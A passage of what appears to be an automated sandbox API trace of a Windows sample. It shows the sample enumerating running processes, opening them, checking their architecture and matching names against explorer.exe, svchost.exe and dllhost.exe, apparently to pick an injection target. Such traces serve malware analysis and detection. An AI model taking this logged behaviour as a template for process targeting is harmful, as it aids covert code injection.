th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0248.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0248.055] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0248.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0248.056] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0248.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0248.057] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0248.058] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0248.058] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0248.059] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0248.059] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0248.060] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.060] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.060] CloseHandle (hObject=0xec) returned 1 [0248.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0248.060] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0248.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0248.061] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.061] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.061] CloseHandle (hObject=0xec) returned 1 [0248.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0248.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0248.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0248.062] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0248.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0248.062] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.062] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.062] CloseHandle (hObject=0xec) returned 1 [0248.063] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0248.063] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0248.063] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0248.063] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0248.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0248.063] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.063] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.063] CloseHandle (hObject=0xec) returned 1 [0248.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0248.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0248.063] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0248.063] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0248.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0248.064] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.064] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.064] CloseHandle (hObject=0xec) returned 1 [0248.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0248.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0248.064] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0248.064] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0248.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0248.065] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.065] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.065] CloseHandle (hObject=0xec) returned 1 [0248.065] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0248.065] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0248.065] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0248.065] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0248.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0248.065] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.065] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.065] CloseHandle (hObject=0xec) returned 1 [0248.066] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0248.066] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0248.066] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0248.066] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0248.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0248.066] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.066] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.066] CloseHandle (hObject=0xec) returned 1 [0248.066] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0248.066] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0248.066] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0248.066] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0248.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0248.067] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.067] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.067] CloseHandle (hObject=0xec) returned 1 [0248.067] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0248.067] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0248.067] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0248.067] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0248.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0248.067] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.068] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.068] CloseHandle (hObject=0xec) returned 1 [0248.068] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0248.068] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0248.068] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0248.068] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0248.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0248.068] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.068] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.068] CloseHandle (hObject=0xec) returned 1 [0248.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0248.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0248.068] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0248.068] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0248.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0248.069] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.069] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.069] CloseHandle (hObject=0xec) returned 1 [0248.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0248.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0248.069] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0248.069] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0248.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0248.070] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.070] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.070] CloseHandle (hObject=0xec) returned 1 [0248.070] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0248.070] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0248.070] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0248.070] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0248.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0248.070] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.070] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.070] CloseHandle (hObject=0xec) returned 1 [0248.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0248.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0248.070] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0248.070] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0248.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0248.071] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.071] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.071] CloseHandle (hObject=0xec) returned 1 [0248.071] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0248.071] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0248.071] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0248.071] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0248.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0248.072] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.072] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.072] CloseHandle (hObject=0xec) returned 1 [0248.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0248.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0248.072] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0248.072] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0248.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0248.072] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.072] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.072] CloseHandle (hObject=0xec) returned 1 [0248.072] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0248.072] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0248.072] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0248.072] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0248.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0248.073] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.073] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.073] CloseHandle (hObject=0xec) returned 1 [0248.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0248.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0248.073] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0248.073] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0248.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0248.074] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.074] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.074] CloseHandle (hObject=0xec) returned 1 [0248.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0248.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0248.074] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0248.074] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0248.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0248.074] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.074] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.074] CloseHandle (hObject=0xec) returned 1 [0248.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0248.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0248.074] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0248.074] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0248.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0248.075] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.075] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.075] CloseHandle (hObject=0xec) returned 1 [0248.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0248.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0248.075] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0248.075] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0248.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0248.076] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.076] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.076] CloseHandle (hObject=0xec) returned 1 [0248.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0248.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0248.076] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0248.076] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0248.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0248.076] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.076] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0248.076] CloseHandle (hObject=0xec) returned 1 [0248.076] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0248.077] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0248.077] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0248.077] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0248.077] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0248.078] Process32Next (in: hSnapshot=0xe8, 